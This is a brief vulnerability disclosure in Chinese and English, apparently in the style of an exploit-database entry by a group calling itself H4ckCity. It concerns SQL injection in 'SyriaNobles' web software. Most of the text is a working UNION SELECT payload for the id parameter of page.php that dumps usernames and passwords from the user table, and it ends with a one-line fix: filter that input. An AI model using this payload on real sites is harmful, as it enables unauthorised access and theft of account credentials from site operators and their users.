标题: SyriaNobles SQL Injection Vulnerabilitiy
作者: H4ckCity Security Team farbodmahini WwW.H4ckCity.Org
影响所有版本
开发者:
测试平台: GNU/Linux Ubuntu - Windows Server - win7
示例
 
/page.php?id=[SQL]
#
#  [~] SQL :
#
#  -1+union+select+1,2,group_concat(id,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11+from+user
#
# 修复
 
过滤page.php参数id输入